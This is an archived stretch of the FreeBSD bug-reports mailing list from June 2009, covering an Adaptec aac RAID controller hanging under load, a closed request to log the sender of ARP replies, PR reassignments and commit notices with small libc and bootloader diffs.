freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Mark Linimon List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 06:20:04 -0000 The following reply was made to PR kern/135408; it has been noted by GNATS. From: Mark Linimon To: bug-followup@FreeBSD.org Cc: Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix Date: Thu, 25 Jun 2009 01:10:16 -0500 ----- Forwarded message from Yuri Gorchakov ----- From: Yuri Gorchakov To: freebsd-bugs@FreeBSD.org Subject: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dear FreeBSD team, this is a comment to kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix (http://www.freebsd.org/cgi/query-pr.cgi?pr=135408) The suggested fix does not fix the problem. Please note! May be the post should be corrected? See the original message to the author of the PR. Yuri G. - -------- Original Message -------- Subject: Adaptec 5405 + FreeBSD issue Date: Thu, 25 Jun 2009 12:12:51 +0700 From: Yuri Gorchakov To: freebsdusb@bindone.de Dear Michael Gmelin, I have the same issue with FreeBSD 7.2 amd64 and Adaptec 5405 controller as posted at http://www.freebsd.org/cgi/query-pr.cgi?pr=135408 I have tried the suggested fix by setting sys/dev/aac/aacvar.h AAC_CMD_TIMEOUT to 45 seconds and it did set the hang moment a little bit higher (I was able to run make -j12 buildworld twice and blogbench with 10 iterations), but didn't fix the problem completely - the controller died while running blogbench with 100 iterations. Have you managed to find the solution on your systems? Yuri. - -- С уважением, Горчаков Юрий. Группа компаний "POiNT". Email: yuri.gorchakov@point-group.ru Web: http://point-group.ru Ð”Ð»Ñ Ð¿ÐµÑ€ÐµÐ´Ð°Ñ‡Ð¸ конфиденциальной информации мне вы можете воÑпользоватьÑÑ ÐºÐ»ÑŽÑ‡Ð¾Ð¼ ÑˆÐ¸Ñ„Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ PGP, Ñкачав его http://point-group.ru/yuri.gorchakov@point-group.ru.pub.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.11 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpDCbQACgkQj73gq1Rwjyh6QgCeOO8sGR/u/j9GHxBjqsy8Varn iJYAn3mmiTFUFGSbpMMi2R6NKcdheNdh =x+i2 -----END PGP SIGNATURE----- ----- End forwarded message ----- From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 06:29:17 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 3A118106564A for ; Thu, 25 Jun 2009 06:29:17 +0000 (UTC) (envelope-from linimon@lonesome.com) Received: from mail.soaustin.net (lefty.soaustin.net [66.135.55.46]) by mx1.freebsd.org (Postfix) with ESMTP id 1D6D18FC1C for ; Thu, 25 Jun 2009 06:29:16 +0000 (UTC) (envelope-from linimon@lonesome.com) Received: by mail.soaustin.net (Postfix, from userid 502) id C18308C07D; Thu, 25 Jun 2009 01:10:44 -0500 (CDT) Date: Thu, 25 Jun 2009 01:10:44 -0500 From: Mark Linimon To: Yuri Gorchakov Message-ID: <20090625061044.GC1018@lonesome.com> References: <4A4309B4.1060203@point-group.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4A4309B4.1060203@point-group.ru> User-Agent: Mutt/1.5.18 (2008-05-17) Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 06:29:17 -0000 I forwarded your message to bug-followup@FreeBSD.org so that it will be in the Audit-Trail. mcl From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 07:29:20 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id ABE5810656C5; Thu, 25 Jun 2009 07:29:20 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 820E88FC1A; Thu, 25 Jun 2009 07:29:20 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5P7TKLW086785; Thu, 25 Jun 2009 07:29:20 GMT (envelope-from linimon@freefall.freebsd.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5P7TKKM086781; Thu, 25 Jun 2009 07:29:20 GMT (envelope-from linimon) Date: Thu, 25 Jun 2009 07:29:20 GMT Message-Id: <200906250729.n5P7TKKM086781@freefall.freebsd.org> To: linimon@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-pf@FreeBSD.org From: linimon@FreeBSD.org Cc: Subject: Re: kern/135948: [pf] [gre] pf not natting gre protocol X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 07:29:21 -0000 Old Synopsis: pf not natting gre protocol New Synopsis: [pf] [gre] pf not natting gre protocol Responsible-Changed-From-To: freebsd-bugs->freebsd-pf Responsible-Changed-By: linimon Responsible-Changed-When: Thu Jun 25 07:29:00 UTC 2009 Responsible-Changed-Why: Over to maintainer(s). http://www.freebsd.org/cgi/query-pr.cgi?pr=135948 From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 09:20:02 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 09B191065691 for ; Thu, 25 Jun 2009 09:20:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id BE2EF8FC0C for ; Thu, 25 Jun 2009 09:20:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5P9K1Xj081245 for ; Thu, 25 Jun 2009 09:20:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5P9K1d6081244; Thu, 25 Jun 2009 09:20:01 GMT (envelope-from gnats) Resent-Date: Thu, 25 Jun 2009 09:20:01 GMT Resent-Message-Id: <200906250920.n5P9K1d6081244@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Arnt Gulbrandsen Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A4C571065672 for ; Thu, 25 Jun 2009 09:13:31 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 92CFF8FC0C for ; Thu, 25 Jun 2009 09:13:31 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5P9DUhq064730 for ; Thu, 25 Jun 2009 09:13:30 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5P9DUsX064729; Thu, 25 Jun 2009 09:13:30 GMT (envelope-from nobody) Message-Id: <200906250913.n5P9DUsX064729@www.freebsd.org> Date: Thu, 25 Jun 2009 09:13:30 GMT From: Arnt Gulbrandsen To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: kern/136023: "ARP: ... moved" log line incomplete X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 09:20:02 -0000 >Number: 136023 >Category: kern >Synopsis: "ARP: ... moved" log line incomplete >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 25 09:20:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Arnt Gulbrandsen >Release: 7.1 >Organization: >Environment: FreeBSD kalyani.oryx.com 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Thu Jan 1 08:58:24 UTC 2009 root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 >Description: When an ARP table entry changes, the kernel logs a line like this (IP addresses and blah kept unchanged): arp: 195.30.37.40 moved from 00:00:24:c0:0e:29 to 00:16:6f:bb:37:8d on nfe0 The log line is based on a packet like this (as reported by tcpdump): 10:50:29.888674 00:16:6f:bb:37:8d > 00:19:66:2a:83:bc, ethertype ARP (0x0806), length 60: arp reply 195.30.37.40 is-at 00:16:6f:bb:37:8d However, the log line does not log one important piece of information: Who sent the ARP reply (00:16:6f:bb:37:8d in this case). IMO it should be something like arp: 195.30.37.40 moved from 00:00:24:c0:0e:29 to 00:16:6f:bb:37:8d on nfe0 based on ARP reply from 00:16:6f:bb:37:8d. >How-To-Repeat: Needs three hosts, all on the same ethernet. On A, set up proxy arp for B, pointing to a nonexistent ARP device. On C, ping B. C will log "ARP: ... moved..." and may or may not be able to send ping replies to B. The log line will not indicate that A is the source of the problem. >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 13:58:51 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 90131106567B; Thu, 25 Jun 2009 13:58:51 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 6654A8FC26; Thu, 25 Jun 2009 13:58:51 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (remko@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5PDwpMn098029; Thu, 25 Jun 2009 13:58:51 GMT (envelope-from remko@freefall.freebsd.org) Received: (from remko@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5PDwofd098025; Thu, 25 Jun 2009 13:58:50 GMT (envelope-from remko) Date: Thu, 25 Jun 2009 13:58:50 GMT Message-Id: <200906251358.n5PDwofd098025@freefall.freebsd.org> To: arnt@gulbrandsen.priv.no, remko@FreeBSD.org, freebsd-bugs@FreeBSD.org From: remko@FreeBSD.org Cc: Subject: Re: kern/136023: "ARP: ... moved" log line incomplete X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 13:58:51 -0000 Synopsis: "ARP: ... moved" log line incomplete State-Changed-From-To: open->closed State-Changed-By: remko State-Changed-When: Thu Jun 25 13:58:50 UTC 2009 State-Changed-Why: There are tools available that monitor more advanced ARP things. I believe that ARP currently is implemented right as it is. The information you are requesting is too much overhead. Thanks for making FreeBSD better! http://www.freebsd.org/cgi/query-pr.cgi?pr=136023 From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 22:08:23 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 483771065670; Thu, 25 Jun 2009 22:08:23 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 1D4908FC12; Thu, 25 Jun 2009 22:08:23 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5PM8MxH072466; Thu, 25 Jun 2009 22:08:22 GMT (envelope-from linimon@freefall.freebsd.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5PM8MW0072462; Thu, 25 Jun 2009 22:08:22 GMT (envelope-from linimon) Date: Thu, 25 Jun 2009 22:08:22 GMT Message-Id: <200906252208.n5PM8MW0072462@freefall.freebsd.org> To: linimon@FreeBSD.org, freebsd-doc@FreeBSD.org, freebsd-bugs@FreeBSD.org From: linimon@FreeBSD.org Cc: Subject: Re: bin/136040: sysinstall(8): A typo in built-in usage info. X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 22:08:23 -0000 Old Synopsis: Sysinstall: A typo in built-in usage info. New Synopsis: sysinstall(8): A typo in built-in usage info. Responsible-Changed-From-To: freebsd-doc->freebsd-bugs Responsible-Changed-By: linimon Responsible-Changed-When: Thu Jun 25 22:07:53 UTC 2009 Responsible-Changed-Why: Problem is in the binary. http://www.freebsd.org/cgi/query-pr.cgi?pr=136040 From owner-freebsd-bugs@FreeBSD.ORG Thu Jun 25 23:11:46 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 673011065675; Thu, 25 Jun 2009 23:11:46 +0000 (UTC) (envelope-from delphij@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 3B57C8FC18; Thu, 25 Jun 2009 23:11:46 +0000 (UTC) (envelope-from delphij@FreeBSD.org) Received: from freefall.freebsd.org (delphij@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5PNBkOK024424; Thu, 25 Jun 2009 23:11:46 GMT (envelope-from delphij@freefall.freebsd.org) Received: (from delphij@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5PNBkgh024420; Thu, 25 Jun 2009 23:11:46 GMT (envelope-from delphij) Date: Thu, 25 Jun 2009 23:11:46 GMT Message-Id: <200906252311.n5PNBkgh024420@freefall.freebsd.org> To: kvl@tomsksoft.com, delphij@FreeBSD.org, freebsd-bugs@FreeBSD.org, delphij@FreeBSD.org From: delphij@FreeBSD.org Cc: Subject: Re: bin/136040: sysinstall(8): A typo in built-in usage info. X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 25 Jun 2009 23:11:46 -0000 Synopsis: sysinstall(8): A typo in built-in usage info. State-Changed-From-To: open->patched State-Changed-By: delphij State-Changed-When: Thu Jun 25 23:11:10 UTC 2009 State-Changed-Why: A patch has been applied against -HEAD. MFC reminder. Responsible-Changed-From-To: freebsd-bugs->delphij Responsible-Changed-By: delphij Responsible-Changed-When: Thu Jun 25 23:11:10 UTC 2009 Responsible-Changed-Why: Take. http://www.freebsd.org/cgi/query-pr.cgi?pr=136040 From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 00:00:08 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id AA4D3106564A for ; Fri, 26 Jun 2009 00:00:08 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 88C3C8FC08 for ; Fri, 26 Jun 2009 00:00:08 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5Q0082a057624 for ; Fri, 26 Jun 2009 00:00:08 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5Q008DI057623; Fri, 26 Jun 2009 00:00:08 GMT (envelope-from gnats) Date: Fri, 26 Jun 2009 00:00:08 GMT Message-Id: <200906260000.n5Q008DI057623@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: kern/63064: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 00:00:08 -0000 The following reply was made to PR kern/63064; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: kern/63064: commit references a PR Date: Thu, 25 Jun 2009 23:59:37 +0000 (UTC) Author: delphij Date: Thu Jun 25 23:59:23 2009 New Revision: 195015 URL: http://svn.freebsd.org/changeset/base/195015 Log: Implement %z for strptime. PR: kern/63064 Submitted by: Stefan `Sec` Zehl (with some small changes) MFC after: 1 month Modified: head/lib/libc/stdtime/strptime.c Modified: head/lib/libc/stdtime/strptime.c ============================================================================== --- head/lib/libc/stdtime/strptime.c Thu Jun 25 23:22:25 2009 (r195014) +++ head/lib/libc/stdtime/strptime.c Thu Jun 25 23:59:23 2009 (r195015) @@ -514,6 +514,34 @@ label: } } break; + + case 'z': + { + int sign = 1; + + if (*buf != '+') { + if (*buf == '-') + sign = -1; + else + return 0; + } + + buf++; + i = 0; + for (len = 4; len > 0; len--) { + if (isdigit((int)*buf)) { + i *= 10; + i += *buf - '0'; + buf++; + } else + return 0; + } + + tm->tm_hour -= sign * (i / 100); + tm->tm_min -= sign * (i % 100); + *GMTp = 1; + } + break; } } return (char *)buf; _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 00:00:42 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 7DEBA1065675; Fri, 26 Jun 2009 00:00:42 +0000 (UTC) (envelope-from delphij@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 54D928FC08; Fri, 26 Jun 2009 00:00:42 +0000 (UTC) (envelope-from delphij@FreeBSD.org) Received: from freefall.freebsd.org (delphij@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5Q00g81062012; Fri, 26 Jun 2009 00:00:42 GMT (envelope-from delphij@freefall.freebsd.org) Received: (from delphij@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5Q00f5g061952; Fri, 26 Jun 2009 00:00:41 GMT (envelope-from delphij) Date: Fri, 26 Jun 2009 00:00:41 GMT Message-Id: <200906260000.n5Q00f5g061952@freefall.freebsd.org> To: sec@42.org, delphij@FreeBSD.org, freebsd-bugs@FreeBSD.org, delphij@FreeBSD.org From: delphij@FreeBSD.org Cc: Subject: Re: kern/63064: [patch] strptime(3) fails on %z X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 00:00:42 -0000 Synopsis: [patch] strptime(3) fails on %z State-Changed-From-To: open->patched State-Changed-By: delphij State-Changed-When: Fri Jun 26 00:00:10 UTC 2009 State-Changed-Why: A patch has been applied against -HEAD, MFC reminder, thanks for your submission! Responsible-Changed-From-To: freebsd-bugs->delphij Responsible-Changed-By: delphij Responsible-Changed-When: Fri Jun 26 00:00:10 UTC 2009 Responsible-Changed-Why: Take. http://www.freebsd.org/cgi/query-pr.cgi?pr=63064 From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 09:40:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 1E408106564A for ; Fri, 26 Jun 2009 09:40:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 0CC688FC17 for ; Fri, 26 Jun 2009 09:40:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5Q9e2gp023749 for ; Fri, 26 Jun 2009 09:40:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5Q9e2kb023748; Fri, 26 Jun 2009 09:40:02 GMT (envelope-from gnats) Date: Fri, 26 Jun 2009 09:40:02 GMT Message-Id: <200906260940.n5Q9e2kb023748@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: kern/134590: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 09:40:03 -0000 The following reply was made to PR kern/134590; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: kern/134590: commit references a PR Date: Fri, 26 Jun 2009 09:32:46 +0000 (UTC) Author: rpaulo Date: Fri Jun 26 09:32:31 2009 New Revision: 195045 URL: http://svn.freebsd.org/changeset/base/195045 Log: On special systems where the MBR and the GPT are in sync (up to the 4th slicei, Apple EFI hardware), the bootloader will fail to recognize the GPT if it finds anything else but the EFI partition. Change the check to continue detecting the GPT by looking at the EFI partition on the MBR but stopping successfuly after finding it. PR: kern/134590 Submitted by: Christoph Langguth Reviewed by: jhb MFC after: 2 weeks Approved by: re (kib) Modified: head/sys/boot/i386/libi386/biosdisk.c Modified: head/sys/boot/i386/libi386/biosdisk.c ============================================================================== --- head/sys/boot/i386/libi386/biosdisk.c Fri Jun 26 07:11:14 2009 (r195044) +++ head/sys/boot/i386/libi386/biosdisk.c Fri Jun 26 09:32:31 2009 (r195045) @@ -880,7 +880,7 @@ bd_open_gpt(struct open_disk *od, struct for (i = 0; i < NDOSPART; i++) { if (dp[i].dp_typ == 0xee) part++; - else if (dp[i].dp_typ != 0x00) + else if ((part != 1) && (dp[i].dp_typ != 0x00)) return (EINVAL); } if (part != 1) _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 09:44:32 2009 Return-Path: Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id AFCE1106564A; Fri, 26 Jun 2009 09:44:32 +0000 (UTC) (envelope-from arnt@gulbrandsen.priv.no) Received: from kalyani.oryx.com (kalyani.oryx.com [195.30.37.30]) by mx1.freebsd.org (Postfix) with ESMTP id 4DB6D8FC18; Fri, 26 Jun 2009 09:44:31 +0000 (UTC) (envelope-from arnt@gulbrandsen.priv.no) Received: from kalyani.oryx.com (localhost [127.0.0.1]) by kalyani.oryx.com (Postfix) with ESMTP id C66192E2C9; Fri, 26 Jun 2009 11:07:18 +0200 (CEST) Received: from arnt@oryx.com (HELO lochnagar.oryx.com) by kalyani.oryx.com (Archiveopteryx 3.1.0) with esmtp id 1246007238-80172-80171/6/5 (3 recipients); Fri, 26 Jun 2009 11:07:18 +0200 Message-Id: <+6V3qfmNiR4v9c9cNY3R/Q.md5@lochnagar.oryx.com> Date: Fri, 26 Jun 2009 11:09:00 +0200 From: Arnt Gulbrandsen To: remko@freebsd.org References: <200906251358.n5PDwofd098025@freefall.freebsd.org> In-Reply-To: <200906251358.n5PDwofd098025@freefall.freebsd.org> Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=utf-8; format=flowed Mime-Version: 1.0 Sender: arnt@oryx.com Cc: freebsd-bugs@freebsd.org Subject: Re: kern/136023: "ARP: ... moved" log line incomplete X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 09:44:33 -0000 remko@freebsd.org writes: > Synopsis: "ARP: ... moved" log line incomplete > > State-Changed-From-To: open->closed > State-Changed-By: remko > State-Changed-When: Thu Jun 25 13:58:50 UTC 2009 > State-Changed-Why: > There are tools available that monitor more advanced ARP things. I > believe that ARP currently is implemented right as it is. The > information you are requesting is too much overhead. Too much overhead =E2=80=94 do you mean that the 14-byte ethernet header = is not=20 visible in the mbuf? Arnt > http://www.freebsd.org/cgi/query-pr.cgi?pr=3D136023 From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 10:50:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 13938106566C for ; Fri, 26 Jun 2009 10:50:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id F2A998FC08 for ; Fri, 26 Jun 2009 10:50:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5QAo2lK076725 for ; Fri, 26 Jun 2009 10:50:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5QAo2wc076724; Fri, 26 Jun 2009 10:50:02 GMT (envelope-from gnats) Date: Fri, 26 Jun 2009 10:50:02 GMT Message-Id: <200906261050.n5QAo2wc076724@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: Aleksandr Stankevic Cc: Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Aleksandr Stankevic List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 10:50:03 -0000 The following reply was made to PR kern/135408; it has been noted by GNATS. From: Aleksandr Stankevic To: bug-followup@FreeBSD.org, freebsdusb@bindone.de, msmith@freebsd.org, scottl@freebsd.org Cc: Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix Date: Fri, 26 Jun 2009 13:16:44 +0300 --0016e65a0dc421977e046d3da3e1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi there, I've been having the same problem with aac on FreeBSD 7.2/amd64. We bought some Sun Fire X4150 servers which have Adaptec Raid controller and use aac driver. The suggested fix (increasing the timeouts to 45+ seconds) didn't help. It delayed the crash for a bit, but didn't completely fix it. I'm also sending some screenshots of the errors (without debugging, and with debugging), bootup screenshot and dmesg output of the system. If needed, it's possible to grant access to the server via Sun eLOM. -- Aleksandr Stankevic Email: alexiukas@gmail.com ICQ: 214480900 MSN: alex@braske.net Y!M: freelancealex@yahoo.com --0016e65a0dc421977e046d3da3e1 Content-Type: text/plain; charset=US-ASCII; name="aac_dmesg.txt" Content-Disposition: attachment; filename="aac_dmesg.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_fweqyzjx3 Q29weXJpZ2h0IChjKSAxOTkyLTIwMDkgVGhlIEZyZWVCU0QgUHJvamVjdC4NCkNvcHlyaWdodCAo 